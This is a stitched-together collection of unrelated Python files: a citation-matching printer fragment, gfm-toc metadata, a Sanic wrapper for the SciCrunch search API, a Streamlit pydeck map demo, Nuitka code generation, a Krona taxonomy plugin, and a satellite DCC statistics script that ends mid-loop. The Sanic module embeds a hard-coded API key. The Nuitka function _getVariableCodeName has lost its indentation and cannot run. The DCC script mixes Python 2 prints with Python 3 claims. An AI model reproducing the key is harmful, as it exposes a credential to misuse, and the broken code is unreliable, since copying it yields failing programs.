                colorama.Fore.WHITE + colorama.Style.BRIGHT,
                bib_entry,
                colorama.Style.RESET_ALL
            ))
            # print each match, best (highest score) first
            for similarity_score, pj_name, pj_url in \
                    sorted(pj_matches, reverse=True):
                print(" {}{}{:.2f}{} | {} >> URL:{}".format(
                    " " * (15 - 4),
                    score_color(similarity_score, thresholds),
                    similarity_score,
                    colorama.Style.RESET_ALL,
                    highlight_similarity(
                        bib_entry, pj_name.ljust(100, " ")),
                    pj_url
                ))
|
# Package metadata for the gfm-toc distribution.
name = "gfm-toc"
__version__ = '0.0.7'

# Re-export the CLI entry point.
from .md_toc import main
import os
import requests
from sanic.response import json, text, html
# NOTE(review): hard-coded API key checked into source — this should be
# loaded from an environment variable or a secrets store instead.
api_key = '6u6izfSzCHTqVvphJ28lUbAtX0nXGhrd'
def loadMain():
    """Load and serve main.html from the module's directory.

    Returns a sanic html response; on any file error an explanatory
    message is returned instead of raising.
    """
    fileName = os.path.join(os.path.dirname(__file__), 'main.html')
    try:
        # Context manager closes the handle even on a read error (the old
        # code leaked it) and OSError replaces the silent bare `except`.
        with open(fileName, "r") as f:
            htmlText = f.read()
    except OSError:
        return html("We are sorry,there was an error ..., %s is not found"%fileName)
    return html(htmlText)
def getSearch(request):
    """
    Searching function: an interface to elasticsearch

    Expects request.args['query']; optional 'force'='yes' disables the
    suggestion-based query rewriting. Returns a sanic json response
    holding totals, filter facets, sort orders and per-dataset hits.
    """
    summary = {}
    url = 'https://scicrunch.org/api/1/elastic/SPARC_PortalDatasets_pr/_search?api_key='+api_key
    size = '200'
    # Base elasticsearch query: fetch only the fields the UI consumes.
    query = {
        "size": size,
        "from": 0,
        "_source":{
            "includes":["item.keywords","item.name",
                "item.readme",
                "item.description",
                "pennsieve.versionPublishedAt",
                "pennsieve.banner",
                "pennsieve.identifier",
                "contributors.last",
                "contributors.first"],
        },
    }
    q = request.args['query'][0]
    # 'force=yes' skips the typo-correction below.
    force = 'no' if 'force' not in request.args else request.args['force'][0]
    if 'query' in request.args:
        query['query'] = {"query_string": {"query": q}}
        summary['query'] = q
        summary['executed'] = q
        summary['force'] = force
        summary['suggestions'] = __getSuggestions(q, 10)
        if force != 'yes':
            # If the term does not autocomplete to itself, assume a typo
            # and execute the first suggestion instead.
            autocomplete = __getAutoComplete(request.args['query'][0], 1, 'no')
            if q.lower() not in autocomplete:
                if len(summary['suggestions']) > 0:
                    query['query'] = {"query_string": {"query": summary['suggestions'][0]}}
                    summary['executed'] = summary['suggestions'][0]
    # if 'query' in request.args:
    #     query['query'] = {"query_string": {"query": q}}
    response = requests.post(url, json=query)
    summary['total'] = response.json()['hits']['total']
    summary['filters'] = {'keywords':{}, 'authors':{}}
    summary['sorts'] = {'ranking':[],'date':[]}
    summary['hits'] = {}
    dates, srtDates = [], []
    for hit in response.json()['hits']['hits']:
        idx = hit['_source']['pennsieve']['identifier']
        # extract filters
        ## extract from keywords
        for key in hit['_source']['item']['keywords']:
            if key['keyword'] in summary['filters']['keywords']:
                summary['filters']['keywords'][key['keyword']] += [idx]
            else:
                summary['filters']['keywords'][key['keyword']] = [idx]
        ## extract from contributors
        for key in hit['_source']['contributors']:
            name = key['first']['name'] + ' ' + key['last']['name']
            if name in summary['filters']['authors']:
                summary['filters']['authors'][name] += [idx]
            else:
                summary['filters']['authors'][name] = [idx]
        # extract sorting based on ranking
        summary['sorts']['ranking'] += [idx]
        # extract sorting based on dates
        dates += [hit['_source']['pennsieve']['versionPublishedAt']['timestamp']]
        srtDates += [idx]
        # set hit
        ht = {'url': 'https://sparc.science/datasets/'+idx,
              'banner': hit['_source']['pennsieve']['banner']['uri'],
              '_id': hit['_id'],
              '_score': hit['_score'],
              'date': hit['_source']['pennsieve']['versionPublishedAt']['timestamp'],
              'name': hit['_source']['item']['name'],
              'description': hit['_source']['item']['description'],
              'readme': hit['_source']['item']['readme'],
             }
        summary['hits'][idx] = ht
    # sort based on dates
    if len(dates) > 0: # when there are results
        dates, srtDates = zip(*sorted(zip(dates, srtDates),reverse=True))
        summary['sorts']['date'] = list(srtDates)
    return json(summary)
def getSuggestions(request):
    """
    get suggestions function (sanic handler proxying SciCrunch)
    """
    if 'query' not in request.args:
        return json({})
    term = request.args['query'][0]
    limit = request.args['limit'] if 'limit' in request.args else '10'
    return json(__getSuggestions(term, limit))
def __getSuggestions(query, limit):
    """Call the SciCrunch vocabulary 'suggestions' API; return decoded JSON."""
    endpoint = 'https://scicrunch.org/api/1/scigraph/vocabulary/suggestions/' + query
    response = requests.get(endpoint, params={'api_key': api_key, 'limit': limit})
    return response.json()
def getAutoComplete(request):
    """
    get autocomplete function (sanic handler; 'verbose=yes' for raw output)
    """
    if 'query' not in request.args:
        return json({})
    term = request.args['query'][0]
    limit = request.args['limit'] if 'limit' in request.args else '10'
    verbose = 'no' if 'verbose' not in request.args else request.args['verbose'][0]
    return json(__getAutoComplete(term, limit, verbose))
def __getAutoComplete(query, limit, verbose):
    """Query the SciCrunch autocomplete API.

    Returns the raw decoded JSON when verbose == 'yes' — the old code
    wrapped it in a sanic response here, which getAutoComplete() then
    wrapped in json() a second time, double-encoding the reply.
    Otherwise returns a de-duplicated, lower-cased list of completions,
    labels, synonyms and abbreviations (insertion order preserved).
    """
    url = 'https://scicrunch.org/api/1/scigraph/vocabulary/autocomplete/'+query
    params = {'api_key': api_key, 'limit': limit, 'searchSynonyms': 'true',
              'searchAbbreviations': 'false', 'searchAcronyms': 'false',
              'includeDeprecated': 'false'}
    rsp = requests.get(url, params=params)
    payload = rsp.json()
    if verbose == 'yes':
        return payload
    # dict keys give O(1) de-duplication while keeping first-seen order
    # (the old list membership tests were O(n) each).
    seen = dict()
    for completion in payload:
        seen.setdefault(completion['completion'].lower(), None)
        concept = completion['concept']
        for label in concept['labels'] + concept['synonyms'] + concept['abbreviations']:
            seen.setdefault(label.lower(), None)
    return list(seen)
|
# Copyright 2018-2020 Streamlit Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import streamlit as st
import numpy as np
import pandas as pd
import pydeck as pdk
# Empty chart.
st.pydeck_chart()

# Basic chart: 1000 random points scattered around San Francisco.
np.random.seed(12345)  # fixed seed keeps the demo deterministic
df = pd.DataFrame(
    np.random.randn(1000, 2) / [50, 50] + [37.76, -122.4], columns=["lat", "lon"]
)
st.pydeck_chart(
    pdk.Deck(
        map_style="mapbox://styles/mapbox/light-v9",
        initial_view_state=pdk.ViewState(
            latitude=37.76, longitude=-122.4, zoom=11, pitch=50,
        ),
        layers=[
            # Aggregated, extruded hexagon-bin layer.
            pdk.Layer(
                "HexagonLayer",
                data=df,
                get_position="[lon, lat]",
                radius=200,
                elevation_scale=4,
                elevation_range=[0, 1000],
                pickable=True,
                extruded=True,
            ),
            # Raw points drawn on top of the bins.
            pdk.Layer(
                "ScatterplotLayer",
                data=df,
                get_position="[lon, lat]",
                get_color="[200, 30, 0, 160]",
                get_radius=200,
            ),
        ],
    )
)
|
# Copyright 2021, Kay Hayen, mailto:kay.hayen@gmail.com
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Low level variable code generation.
"""
from nuitka.nodes.shapes.BuiltinTypeShapes import (
tshape_bool,
tshape_int_or_long,
)
from nuitka.PythonVersions import python_version
from .c_types.CTypeNuitkaBools import CTypeNuitkaBoolEnum
from .c_types.CTypePyObjectPtrs import (
CTypeCellObject,
CTypePyObjectPtr,
CTypePyObjectPtrPtr,
)
from .CodeHelpers import (
decideConversionCheckNeeded,
generateExpressionCode,
withObjectCodeTemporaryAssignment2,
)
from .ErrorCodes import (
getAssertionCode,
getErrorExitCode,
getLocalVariableReferenceErrorCode,
getNameReferenceErrorCode,
)
from .VariableDeclarations import VariableDeclaration
def generateAssignmentVariableCode(statement, emit, context):
    """Emit C code assigning the statement's source expression to its variable.

    Picks a temporary C type matching the target declaration where the
    source type shape allows it, so boxing can be avoided.
    """
    assign_source = statement.subnode_source

    variable = statement.getVariable()
    variable_trace = statement.getVariableTrace()

    if variable.isModuleVariable():
        # Use "object" for module variables.
        tmp_name = context.allocateTempName("assign_source")
    else:
        source_shape = assign_source.getTypeShape()

        variable_declaration = getLocalVariableDeclaration(
            context, variable, variable_trace
        )

        # Match the temp's C type to the declared storage when profitable.
        if source_shape is tshape_bool and variable_declaration.c_type == "nuitka_bool":
            tmp_name = context.allocateTempName("assign_source", "nuitka_bool")
        elif (
            source_shape is tshape_int_or_long
            and variable_declaration.c_type == "nuitka_ilong"
        ):
            tmp_name = context.allocateTempName("assign_source", "nuitka_ilong")
        else:
            tmp_name = context.allocateTempName("assign_source")

    generateExpressionCode(
        expression=assign_source, to_name=tmp_name, emit=emit, context=context
    )

    getVariableAssignmentCode(
        tmp_name=tmp_name,
        variable=variable,
        variable_trace=variable_trace,
        needs_release=statement.needsReleasePreviousValue(),
        in_place=statement.isInplaceSuspect(),
        emit=emit,
        context=context,
    )

    # Ownership of that reference must have been transferred.
    assert not context.needsCleanup(tmp_name)
def generateDelVariableCode(statement, emit, context):
    """Emit code deleting a variable, restoring the source reference after."""
    previous_source_ref = context.setCurrentSourceCodeReference(
        statement.getSourceReference()
    )

    _getVariableDelCode(
        variable=statement.getVariable(),
        variable_trace=statement.variable_trace,
        previous_trace=statement.previous_trace,
        tolerant=statement.isTolerant(),
        # Tolerant deletes are checked too; otherwise only if it may raise.
        needs_check=statement.isTolerant()
        or statement.mayRaiseException(BaseException),
        emit=emit,
        context=context,
    )

    context.setCurrentSourceCodeReference(previous_source_ref)
def getVariableReferenceCode(
    to_name, variable, variable_trace, needs_check, conversion_check, emit, context
):
    """Emit C code reading *variable* into *to_name*.

    Module variables are fetched from the module dictionary with a
    fallback helper; local variables are read from their declaration,
    with an optional unbound-value check.
    """
    if variable.isModuleVariable():
        owner = context.getOwner()

        with withObjectCodeTemporaryAssignment2(
            to_name, "mvar_value", conversion_check, emit, context
        ) as value_name:
            # TODO: Rather have this passed from a distinct node type, so inlining
            # doesn't change things.

            emit(
                """\
%(value_name)s = GET_STRING_DICT_VALUE(moduledict_%(module_identifier)s, (Nuitka_StringObject *)%(var_name)s);
if (unlikely(%(value_name)s == NULL)) {
    %(value_name)s = %(helper_code)s(%(var_name)s);
}
"""
                % {
                    "helper_code": "GET_MODULE_VARIABLE_VALUE_FALLBACK_IN_FUNCTION"
                    if python_version < 0x340
                    and not owner.isCompiledPythonModule()
                    and not owner.isExpressionClassBody()
                    else "GET_MODULE_VARIABLE_VALUE_FALLBACK",
                    "module_identifier": context.getModuleCodeName(),
                    "value_name": value_name,
                    "var_name": context.getConstantCode(constant=variable.getName()),
                }
            )

            getErrorExitCode(
                check_name=value_name,
                emit=emit,
                context=context,
                needs_check=needs_check,
            )
    else:
        variable_declaration = getLocalVariableDeclaration(
            context, variable, variable_trace
        )

        value_name = variable_declaration.getCType().emitValueAccessCode(
            value_name=variable_declaration, emit=emit, context=context
        )

        if needs_check:
            condition = value_name.getCType().getInitTestConditionCode(
                value_name, inverted=True
            )

            getLocalVariableReferenceErrorCode(
                variable=variable, condition=condition, emit=emit, context=context
            )
        else:
            value_name.getCType().emitValueAssertionCode(
                value_name=value_name, emit=emit
            )

        to_name.getCType().emitAssignConversionCode(
            to_name=to_name,
            value_name=value_name,
            needs_check=conversion_check,
            emit=emit,
            context=context,
        )
def generateVariableReferenceCode(to_name, expression, emit, context):
    """Emit code for a variable reference expression node."""
    getVariableReferenceCode(
        to_name=to_name,
        variable=expression.getVariable(),
        variable_trace=expression.getVariableTrace(),
        needs_check=expression.mayRaiseException(BaseException),
        conversion_check=decideConversionCheckNeeded(to_name, expression),
        emit=emit,
        context=context,
    )
def _getVariableCodeName(in_context, variable):
if in_context:
# Closure case:
return "closure_" + variable.getCodeName()
elif variable.isParameterVariable():
return "par_" + variable.getCodeName()
elif variable.isTempVariable():
return "tmp_" + variable.getCodeName()
else:
return "var_" + variable.getCodeName()
def getPickedCType(variable, context):
    """Return the C type to use for *variable* in the given context.

    Technically shared variables need a cell object; direct calls pass
    pointers; otherwise a single known type shape decides the C type.
    (The old code tested ``len(shapes) > 1`` twice, nested redundantly.)
    """
    user = context.getEntryPoint()
    owner = variable.getEntryPoint()

    if owner is user:
        if variable.isSharedTechnically():
            # TODO: That need not really be an impedient, we could share pointers to
            # everything.
            return CTypeCellObject

        shapes = variable.getTypeShapes()

        if len(shapes) > 1:
            # Avoiding this for now, but we will have to use our enum
            # based code variants, either generated or hard coded in
            # the future.
            return CTypePyObjectPtr

        return shapes.pop().getCType()

    if context.isForDirectCall():
        if variable.isSharedTechnically():
            return CTypeCellObject

        return CTypePyObjectPtrPtr

    return CTypeCellObject
def decideLocalVariableCodeType(context, variable):
    """Return ``(code_name, c_type)`` for a local or temporary *variable*.

    Resolves outline functions to their entry point, picks the C type,
    and produces either a plain identifier or a closure slot access
    expression depending on where the variable lives.
    """
    # Now must be local or temporary variable.

    # Complexity should be moved out of here, pylint: disable=too-many-branches

    user = context.getOwner()
    owner = variable.getOwner()

    user = user.getEntryPoint()

    prefix = ""

    if owner.isExpressionOutlineFunctionBase():
        entry_point = owner.getEntryPoint()

        # Outlined variables are disambiguated by their outline index.
        prefix = (
            "outline_%d_"
            % entry_point.getTraceCollection().getOutlineFunctions().index(owner)
        )

        owner = entry_point

    if variable.isTempVariableBool():
        c_type = CTypeNuitkaBoolEnum
    else:
        c_type = getPickedCType(variable, context)

    if owner is user:
        result = _getVariableCodeName(in_context=False, variable=variable)

        result = prefix + result
    elif context.isForDirectCall():
        # Direct calls reach closure variables through the generator /
        # coroutine / asyncgen object, when there is one.
        if user.isExpressionGeneratorObjectBody():
            closure_index = user.getClosureVariableIndex(variable)

            result = "generator->m_closure[%d]" % closure_index
        elif user.isExpressionCoroutineObjectBody():
            closure_index = user.getClosureVariableIndex(variable)

            result = "coroutine->m_closure[%d]" % closure_index
        elif user.isExpressionAsyncgenObjectBody():
            closure_index = user.getClosureVariableIndex(variable)

            result = "asyncgen->m_closure[%d]" % closure_index
        else:
            result = _getVariableCodeName(in_context=True, variable=variable)

            result = prefix + result
    else:
        closure_index = user.getClosureVariableIndex(variable)

        if user.isExpressionGeneratorObjectBody():
            result = "generator->m_closure[%d]" % closure_index
        elif user.isExpressionCoroutineObjectBody():
            result = "coroutine->m_closure[%d]" % closure_index
        elif user.isExpressionAsyncgenObjectBody():
            result = "asyncgen->m_closure[%d]" % closure_index
        else:
            # TODO: If this were context.getContextObjectName() this would be
            # a one liner.

            result = "self->m_closure[%d]" % closure_index

    return result, c_type
def getLocalVariableDeclaration(context, variable, variable_trace):
    """Look up the C declaration of a local or temporary variable.

    Owned variables live in the function's own storage (with an outline
    prefix when applicable); anything else is a closure slot.
    """
    # TODO: Decide if we will use variable trace, pylint: disable=unused-argument

    user = context.getOwner().getEntryPoint()
    owner = variable.getOwner()

    prefix = ""
    if owner.isExpressionOutlineFunctionBase():
        entry_point = owner.getEntryPoint()
        prefix = (
            "outline_%d_"
            % entry_point.getTraceCollection().getOutlineFunctions().index(owner)
        )
        owner = entry_point

    if owner is not user:
        closure_index = user.getClosureVariableIndex(variable)
        return context.variable_storage.getVariableDeclarationClosure(closure_index)

    code_name = prefix + _getVariableCodeName(in_context=False, variable=variable)
    declaration = context.variable_storage.getVariableDeclarationTop(code_name)
    assert declaration is not None, variable
    return declaration
def getVariableAssignmentCode(
    context, emit, variable, variable_trace, tmp_name, needs_release, in_place
):
    """Emit C code storing *tmp_name* into *variable*.

    Transfers reference ownership when the temp was marked for cleanup,
    and releases the previous value when *needs_release* is set.
    """
    # For transfer of ownership.
    if context.needsCleanup(tmp_name):
        ref_count = 1
    else:
        ref_count = 0

    if variable.isModuleVariable():
        variable_declaration = VariableDeclaration(
            "module_var", variable.getName(), None, None
        )
    else:
        variable_declaration = getLocalVariableDeclaration(
            context, variable, variable_trace
        )

        assert variable_declaration, (variable, context)

        if variable.isLocalVariable():
            context.setVariableType(variable, variable_declaration)

    variable_declaration.getCType().emitVariableAssignCode(
        value_name=variable_declaration,
        needs_release=needs_release,
        tmp_name=tmp_name,
        ref_count=ref_count,
        in_place=in_place,
        emit=emit,
        context=context,
    )

    if ref_count:
        # Reference ownership was passed on to the variable.
        context.removeCleanupTempName(tmp_name)
def _getVariableDelCode(
    variable, variable_trace, previous_trace, tolerant, needs_check, emit, context
):
    """Emit C code for ``del variable``.

    Tolerant deletes ignore an unset variable; otherwise a bool result
    is captured and the appropriate reference error is raised.
    """
    if variable.isModuleVariable():
        variable_declaration_old = VariableDeclaration(
            "module_var", variable.getName(), None, None
        )
        variable_declaration_new = variable_declaration_old
    else:
        variable_declaration_old = getLocalVariableDeclaration(
            context, variable, previous_trace
        )
        variable_declaration_new = getLocalVariableDeclaration(
            context, variable, variable_trace
        )

        # TODO: We need to split this operation in two parts. Release and init
        # are not one thing, until then require this.
        assert variable_declaration_old == variable_declaration_new

        if variable.isLocalVariable():
            context.setVariableType(variable, variable_declaration_new)

    if needs_check and not tolerant:
        to_name = context.getBoolResName()
    else:
        to_name = None

    variable_declaration_old.getCType().getDeleteObjectCode(
        to_name=to_name,
        value_name=variable_declaration_old,
        tolerant=tolerant,
        needs_check=needs_check,
        emit=emit,
        context=context,
    )

    if needs_check and not tolerant:
        if variable.isModuleVariable():
            getNameReferenceErrorCode(
                variable_name=variable.getName(),
                condition="%s == false" % to_name,
                emit=emit,
                context=context,
            )
        elif variable.isLocalVariable():
            getLocalVariableReferenceErrorCode(
                variable=variable,
                condition="%s == false" % to_name,
                emit=emit,
                context=context,
            )
        else:
            # Deleting a temporary variable must always succeed.
            getAssertionCode(check="%s != false" % to_name, emit=emit)
def generateVariableReleaseCode(statement, emit, context):
    """Emit C code that releases the value held by a local variable.

    Module variables are excluded by assertion; their release is handled
    through other means.
    """
    released = statement.getVariable()
    # Only for normal variables we do this.
    assert not released.isModuleVariable()
    trace = statement.getVariableTrace()
    if released.isSharedTechnically():
        # TODO: We might start to not allocate the cell object, then a check
        # would be due. But currently we always allocate it.
        needs_check = False
    else:
        # A check is needed unless the trace proves a value must be present.
        needs_check = not trace.mustHaveValue()
    declaration = getLocalVariableDeclaration(context, released, trace)
    variable_c_type = declaration.getCType()
    if not needs_check:
        variable_c_type.emitReleaseAssertionCode(value_name=declaration, emit=emit)
    variable_c_type.getReleaseCode(
        value_name=declaration, needs_check=needs_check, emit=emit
    )
    variable_c_type.emitReinitCode(value_name=declaration, emit=emit)
|
import sys
class KronaTreePlugin:
    """Collects taxonomy names per rank from a Krona-style TSV file.

    Each input line is tab separated; columns 3..10 hold (in order)
    kingdom, phylum, class, order, family, genus, species and strain.
    run() fills one set attribute per rank; output() writes each set to
    its own '<filename>.<rank>.txt' file, one name per line.
    """

    # (attribute holding the set, output-file rank label, TSV column index)
    _RANKS = (
        ('kingdoms', 'kingdom', 3),
        ('phyla', 'phylum', 4),
        ('classes', 'class', 5),
        ('orders', 'order', 6),
        ('families', 'family', 7),
        ('genera', 'genus', 8),
        ('species', 'species', 9),
        ('strains', 'strain', 10),
    )

    def input(self, filename):
        """Open the Krona TSV file that run() will parse."""
        self.kronafile = open(filename, 'r')

    def run(self):
        """Parse the file, collecting the names found at every rank."""
        for attr, _, _ in self._RANKS:
            setattr(self, attr, set())
        for line in self.kronafile:
            contents = line.strip().split('\t')
            for attr, _, column in self._RANKS:
                if len(contents) > column:
                    getattr(self, attr).add(contents[column])
            if len(contents) > 11:
                print("WARNING: MORE THAN 11 ENTRIES: "
                      + line.strip().replace('\t', '|'))
        # Fix: the original never closed the input file handle.
        self.kronafile.close()

    def output(self, filename):
        """Write one '<filename>.<rank>.txt' file per rank."""
        for attr, rank, _ in self._RANKS:
            # Fix: the original opened eight files and closed none of them.
            with open(filename + "." + rank + ".txt", 'w') as out:
                for name in getattr(self, attr):
                    out.write(name + "\n")
|
# coding:utf-8
"""
Created on 2018年4月10日
@author: anning
"""
import re
import os
import sys
import h5py
from datetime import datetime
import numpy as np
from configobj import ConfigObj
from dateutil.relativedelta import relativedelta
from PB import pb_time
def dcc_find_file(ipath, ifile, c_date, rolldays):
    """Collect the existing files over a rolling date window.

    The placeholders %YYYY, %MM and %DD inside ``ipath`` and ``ifile`` are
    substituted with each date of the window
    [c_date - rolldays + 1, c_date].

    :param ipath: input directory pattern (may contain date placeholders)
    :param ifile: file-name pattern (may contain date placeholders)
    :param c_date: the current (last) date of the window
    :param rolldays: number of days in the window
    :return: list of full paths of the files that exist on disk
    """
    found = []
    if not isinstance(rolldays, int):
        rolldays = int(rolldays)
    # First date of the window, then walk forward one day at a time.
    day = c_date - relativedelta(days=(rolldays - 1))
    while day <= c_date:
        ymd = day.strftime('%Y%m%d')
        year, month, dom = ymd[0:4], ymd[4:6], ymd[6:8]
        directory = (ipath.replace('%YYYY', year)
                     .replace('%MM', month)
                     .replace('%DD', dom))
        name = (ifile.replace('%YYYY', year)
                .replace('%MM', month)
                .replace('%DD', dom))
        candidate = os.path.join(directory, name)
        if os.path.isfile(candidate):
            found.append(candidate)
        day = day + relativedelta(days=1)
    return found
class DccDataRead(object):
    """Accumulates DCC statistics read from a list of HDF5 files.

    Attributes filled by load():
    percent -- 'DCC_Percent' dataset (index 2; FY3D stores it 3-D, FY3C 2-D)
    dn      -- 'DN_ADMs' dataset, concatenated along axis 1 across files
    ref     -- 'REF_ADMs' dataset, concatenated along axis 1 across files
    FileLst -- input file list; unreadable files are dropped from it
    """
    def __init__(self):
        self.empty = True  # True until the first file has been loaded
        self.percent = None
        self.dn = None
        self.ref = None
        self.FileLst = []

    def load(self):
        """Read every file in FileLst, accumulating the three datasets."""
        # Iterate over a copy: unreadable entries are removed from the real
        # list (the original mutated the list being iterated AND called
        # list.pop() with a value where an index is expected -> TypeError).
        for iFile in list(self.FileLst):
            try:
                h5File_R = h5py.File(iFile, 'r')
                # FY3D adjustment: DCC_Percent is 3-D there, 2-D for FY3C.
                percent = h5File_R.get('DCC_Percent')[2]
                dn = h5File_R.get('DN_ADMs')[:]
                ref = h5File_R.get('REF_ADMs')[:]
                h5File_R.close()
            except Exception as e:
                self.FileLst.remove(iFile)
                print(str(e))
                # Fix: skip this file -- the original fell through and
                # reused the previous iteration's (or undefined) arrays.
                continue
            if self.empty:
                # First successfully read file.
                self.percent = percent
                self.dn = dn
                self.ref = ref
            else:
                # Append subsequent files.
                self.percent = np.concatenate((self.percent, percent), axis=0)
                self.dn = np.concatenate((self.dn, dn), axis=1)
                self.ref = np.concatenate((self.ref, ref), axis=1)
            self.empty = False
def dcc_data_process(data, share):
    """Per-channel mean, median and mode (histogram peak) of valid samples.

    Samples >= 65535 are treated as fill values and excluded.  A channel
    with no valid sample yields NaN for all three statistics.

    :param data: array whose first axis enumerates channels
    :param share: number of histogram bins used for the mode estimate
    :return: (means, medians, modes) as 1-D np.ndarray, one entry per channel
    """
    means, medians, modes = [], [], []
    for channel in range(data.shape[0]):
        valid = np.where(data[channel] < 65535)
        if len(valid[0]) == 0:
            # No valid sample at all: record fill statistics.
            means.append(np.nan)
            medians.append(np.nan)
            modes.append(np.nan)
            continue
        samples = data[channel, valid]
        hist, edges = np.histogram(samples, share)
        peak = np.argmax(hist)
        means.append(np.mean(samples))
        medians.append(np.median(samples))
        # Mode estimate: center of the most populated histogram bin.
        modes.append((edges[peak] + edges[peak + 1]) / 2)
    return np.array(means), np.array(medians), np.array(modes)
def dcc_data_write(title, data, outFile):
    """Insert or update one dated record in a fixed-width text file.

    The file starts with ``title``; every following line begins with an
    8-character date (YYYYMMDD) used as the record key.  A record with the
    same date is overwritten, otherwise the new record is inserted, and all
    records are kept sorted by date.

    :param title: header line, written verbatim
    :param data: record line; the first 8 characters are the date key
    :param outFile: output file path (missing parent dirs are created)
    """
    out_dir = os.path.dirname(outFile)
    # Guard the empty dirname (bare file name) -- makedirs('') raises.
    if out_dir and not os.path.exists(out_dir):
        os.makedirs(out_dir)
    if os.path.isfile(outFile) and os.path.getsize(outFile) != 0:
        with open(outFile, 'r') as fp:
            fp.readline()  # skip the existing title line
            lines = fp.readlines()
        # Key records by date so every date stays unique.
        records = {}
        for line in lines:
            records[line[:8]] = line[8:]
        # Add or replace the new record.
        records[data[:8]] = data[8:]
        # Fix: .items()/range() work on both Python 2 and 3, unlike the
        # original .iteritems()/xrange(); files are also closed reliably.
        allLines = [key + rest for key, rest in sorted(records.items())]
        with open(outFile, 'w') as fp:
            fp.write(title)
            fp.writelines(allLines)
    else:
        with open(outFile, 'w') as fp:
            fp.write(title)
            fp.writelines(data)
def get_file_list(dir_path, pattern=r'.*'):
    """Recursively collect the absolute paths of files matching a regex.

    :param dir_path: (str) directory to walk (subdirectories included)
    :param pattern: (str) regular expression matched against file names
    :return: (list) paths of matching files
    """
    regex = re.compile(pattern)
    matched = []
    for root, _, names in os.walk(dir_path):
        matched.extend(os.path.join(root, name)
                       for name in names if regex.match(name))
    return matched
def load_day_ext(ext_file):
    """
    Load a daily EXT statistics file into a structured np.array.

    The file is whitespace separated with one header line (skipped); column
    0 holds a YYYYMMDD date that is parsed into datetime objects.

    NOTE(review): whether np.loadtxt hands the converter bytes or str
    depends on the NumPy version -- verify against the deployed NumPy.

    :param ext_file: path of the daily EXT file
    :return: structured array with fields date/avg/med/mod/dcc_files/
        dcc_point/dcc_precent/dcc_dim (ndmin=1, so always at least 1-D)
    """
    names = ('date', 'avg', 'med', 'mod',
             'dcc_files', 'dcc_point', 'dcc_precent', 'dcc_dim')
    formats = ('object', 'f4', 'f4', 'f4',
               'i4', 'i4', 'i4', 'i4')
    data = np.loadtxt(ext_file,
                      converters={0: lambda x: datetime.strptime(x, "%Y%m%d")},
                      dtype={'names': names,
                             'formats': formats},
                      skiprows=1, ndmin=1)
    return data
def month_average(day_data):
    """
    Build EXT monthly-average text records from EXT daily data.

    Means of avg/med/mod and sums of dcc_files/dcc_point are computed per
    calendar month; dcc_precent/dcc_dim take the month's first record.

    :param day_data: structured daily EXT array (see load_day_ext)
    :return: list of fixed-width text lines, one per month
    """
    month_datas = []
    ymd_s = day_data['date'][0]  # first day present in the data
    ymd_e = day_data['date'][-1]  # last day present in the data
    date_s = ymd_s - relativedelta(days=(ymd_s.day - 1))  # first day of the first month
    while date_s <= ymd_e:
        # Last day of the current month.
        date_e = date_s + relativedelta(months=1) - relativedelta(days=1)
        # Select every record that falls inside the current month.
        day_date = day_data['date']
        month_idx = np.where(np.logical_and(day_date >= date_s,
                                            day_date <= date_e))
        avg_month = day_data['avg'][month_idx]
        med_month = day_data['med'][month_idx]
        mod_month = day_data['mod'][month_idx]
        dcc_files_month = day_data['dcc_files'][month_idx]
        dcc_point_month = day_data['dcc_point'][month_idx]
        dcc_precent_month = day_data['dcc_precent'][month_idx]
        dcc_dim_month = day_data['dcc_dim'][month_idx]
        ymd_data = date_s.strftime('%Y%m%d')
        avg_data = avg_month.mean()
        med_data = med_month.mean()
        mod_data = mod_month.mean()
        dcc_files_data = dcc_files_month.sum()
        dcc_point_data = dcc_point_month.sum()
        # NOTE(review): a month inside the range with zero records would
        # raise IndexError on the [0] lookups below -- confirm inputs are
        # gap-free per month.
        dcc_precent_data = dcc_precent_month[0]
        dcc_dim_data = dcc_dim_month[0]
        data = ('%-15s' + '%-15.6f' * 3 + '%-15d' * 4 + '\n') % (
            ymd_data, avg_data, med_data, mod_data,
            dcc_files_data, dcc_point_data, dcc_precent_data, dcc_dim_data)
        month_datas.append(data)
        date_s = date_s + relativedelta(months=1)
    return month_datas
def run(rollday):
    """Process one rolling-window size: build the daily DCC statistics
    files, then derive the monthly averages from them.

    NOTE(review): relies on the module-level globals ``inCfg``, ``satFlag``
    and ``str_time`` being set by the __main__ block before this is called.

    :param rollday: rolling-window size in days (string from the config)
    """
    rollday = rollday  # no-op self-assignment kept from the original
    ipath = inCfg['ext'][satFlag]['ipath']
    mpath = inCfg['ext'][satFlag]['mpath']
    ifile = inCfg['ext'][satFlag]['regular']
    percent = int(inCfg['ext'][satFlag]['percent'])
    share = int(inCfg['ext'][satFlag]['share'])
    window = int(inCfg['ext'][satFlag]['window'])
    # lanch_date = inCfg['ext'][satFlag]['lanch_date']
    # Process day by day over the requested time range.
    date_s, date_e = pb_time.arg_str2date(str_time)
    while date_s <= date_e:
        ymd = date_s.strftime('%Y%m%d')
        ######### Step 1: find all files in the rolling window ending today
        FileLst = dcc_find_file(ipath, ifile, date_s, rollday)
        ######### Step 2: read every file in the window, accumulating data
        dcc = DccDataRead()
        dcc.FileLst = FileLst
        dcc.load()
        if len(FileLst) != 0:
            ######### Step 3: compute mean, median and mode (histogram peak)
            Dn_mean, Dn_median, Dn_mode = dcc_data_process(dcc.dn[:, :, window],
                                                           share)
            Ref_mean, Ref_median, Ref_mode = dcc_data_process(
                dcc.ref[:, :, window], share)
            print 'rollday: %s, date: %s' % (rollday, ymd)
            ######### Step 4: write results, one output file per channel
            ######### DN values
            for i in range(Dn_mean.shape[0]):
                band = i + 1
                # FY3C MERSI: channel indexes >= 4 skip one band number.
                if i >= 4 and 'FY3C+MERSI' in satFlag:
